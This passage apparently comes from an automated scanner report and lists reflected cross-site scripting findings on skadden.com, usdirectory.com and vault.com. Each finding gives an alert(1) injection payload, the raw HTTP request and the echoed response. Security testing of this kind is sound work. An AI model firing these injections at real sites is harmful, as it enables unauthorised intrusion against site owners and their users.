Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2C86470%22%2Dalert%281%29%2D%22c4c00aee9af%3D1;expires=Fri, 11-Jan-2041 15:14:49 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E
...[SNIP]...
<script type="text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&86470"-alert(1)-"c4c00aee9af=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

4.111. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bb3"-alert(1)-"0eb36443031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.cfm?contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1 HTTP/1.1
Host: www.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1;expires=Fri, 11-Jan-2041 15:14:54 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                               <!DOCTYPE html PUB
...[SNIP]...
"text/javascript">
extra = "height="+screen.height+",width="+screen.width+",location=no";
function printWindow(){
window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1","PDF",extra)
}

function pdfWindow(url){
window.open(url,"PDF",extra);
}
</script>
...[SNIP]...

4.112. http://www.usdirectory.com/gypr.aspx [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usdirectory.com
Path:   /gypr.aspx

Issue detail

The value of the cc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ab29'%3balert(1)//2894fafc0c6 was submitted in the cc parameter. This input was echoed as 4ab29';alert(1)//2894fafc0c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gypr.aspx?afid=1993&cc=54111051004ab29'%3balert(1)//2894fafc0c6&cr=3209505169&ct=Washington/x22 HTTP/1.1
Host: www.usdirectory.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:08 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:08 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
var switch_open_once_only=1;
       function open_once_only(){
           if(switch_open_once_only){
document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=3209505169&oid=&cc=54111051004ab29';alert(1)//2894fafc0c6';    
switch_open_once_only=0;
           }
       }
       function quicksearchform_onsubmit() {
           var form = document.forms.quicksearchform;
           var str = form.qhqn.value;
           
           /*if( document.getElementB
...[SNIP]...

4.113. http://www.usdirectory.com/gypr.aspx [cr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usdirectory.com
Path:   /gypr.aspx

Issue detail

The value of the cr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5878e'%3balert(1)//136c0518b8b was submitted in the cr parameter. This input was echoed as 5878e';alert(1)//136c0518b8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gypr.aspx?afid=1993&cc=5411105100&cr=32095051695878e'%3balert(1)//136c0518b8b&ct=Washington/x22 HTTP/1.1
Host: www.usdirectory.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:19 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:18 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <m
...[SNIP]...
xt/javascript">
       var switch_open_once_only=1;
       function open_once_only(){
           if(switch_open_once_only){
document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=32095051695878e';alert(1)//136c0518b8b&oid=&cc=5411105100';    
switch_open_once_only=0;
           }
       }
       function quicksearchform_onsubmit() {
           var form = document.forms.quicksearchform;
           var str = form.qhqn.value;
           
           /*if( d
...[SNIP]...

4.114. http://www.vault.com/wps/portal/usa/rankings/individual [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c40'%3balert(1)//dba4d06d54c was submitted in the REST URL parameter 4. This input was echoed as f6c40';alert(1)//dba4d06d54c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankingsf6c40'%3balert(1)//dba4d06d54c/individual HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:10:14 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000DmxfkY9YKAx1Q4mLBLNSFjN:140i3s34m; Path=/
Keep-Alive: timeout=10, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:18 GMT;path=/
Content-Length: 68250


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
ideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankingsf6c40';alert(1)//dba4d06d54c/individual'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google
...[SNIP]...

4.115. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1411"><script>alert(1)</script>54ec8343c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:49 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000qF5wpbf0wl-7odhNiMXKAn9:140i3s34m; Path=/
Keep-Alive: timeout=10, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:53 GMT;path=/
Content-Length: 104190


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/
...[SNIP]...

4.116. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8325'-alert(1)-'adbf0a50b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:52 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000YsvtmY0WeGqmBw8q3S7jS3Y:140i3s34m; Path=/
Keep-Alive: timeout=10, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:11:57 GMT;path=/
Content-Length: 104769


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenge
...[SNIP]...

4.117. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72071"><script>alert(1)</script>cbaa09597bd was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=272071"><script>alert(1)</script>cbaa09597bd&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:09:58 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000PjHkXd4fWrCD7JGVNx5m439:140i3s34m; Path=/
Keep-Alive: timeout=10, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:03 GMT;path=/
Content-Length: 67444


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=272071"><script>alert(1)</script>cbaa09597bd&rankingId2=-1&rankings=1&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Ema
...[SNIP]...

4.118. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aad31'-alert(1)-'06716bb157a was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2aad31'-alert(1)-'06716bb157a&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:02 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000WFjo2zwl_9oEr80PpKWu5gg:140i3s34m; Path=/
Keep-Alive: timeout=10, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:07 GMT;path=/
Content-Length: 68247


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
TML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2aad31'-alert(1)-'06716bb157a&rankingId2=-1&rankings=1&regionId=0/x22'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,
...[SNIP]...

4.119. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa29d"><script>alert(1)</script>5276a27416 was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d"><script>alert(1)</script>5276a27416&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:14 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; Path=/
Keep-Alive: timeout=10, max=79
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:19 GMT;path=/
Content-Length: 105551


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d"><script>alert(1)</script>5276a27416&rankings=1&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://w
...[SNIP]...

4.120. http://www.vault.com/wps/portal/usa/rankings/individual [rankingId2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankingId2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3ee'-alert(1)-'98bd799206f was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-17c3ee'-alert(1)-'98bd799206f&rankings=1&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:19 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000MQBSbTmGmG6cUM5JRSrgH2H:140i3s34m; Path=/
Keep-Alive: timeout=10, max=32
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:23 GMT;path=/
Content-Length: 105369


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
WhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-17c3ee'-alert(1)-'98bd799206f&rankings=1&regionId=0/x22'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,
...[SNIP]...

4.121. http://www.vault.com/wps/portal/usa/rankings/individual [rankings parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankings request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47dd0"><script>alert(1)</script>38ea02e91b3 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=147dd0"><script>alert(1)</script>38ea02e91b3&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:32 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000ZhDNSaflUJHG19KHTNmMcEc:140i3s34m; Path=/
Keep-Alive: timeout=10, max=70
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:37 GMT;path=/
Content-Length: 112861


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=147dd0"><script>alert(1)</script>38ea02e91b3&regionId=0/x22" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.co
...[SNIP]...

4.122. http://www.vault.com/wps/portal/usa/rankings/individual [rankings parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/rankings/individual

Issue detail

The value of the rankings request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5bc'-alert(1)-'f398cddff33 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=19e5bc'-alert(1)-'f398cddff33&regionId=0/x22 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:10:36 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvI6MAA6B8JJK8f6Cxi4GnQbCfr7GZqY-xjyEB3eEg-_DrB8kb4ACOBvp-Hvm5qfoFuREGWSaOigADgNEb/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=00006eAw26jeIW_D_4cRI9jb5gh:140i3s34m; Path=/
Keep-Alive: timeout=10, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:40 GMT;path=/
Content-Length: 112654


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
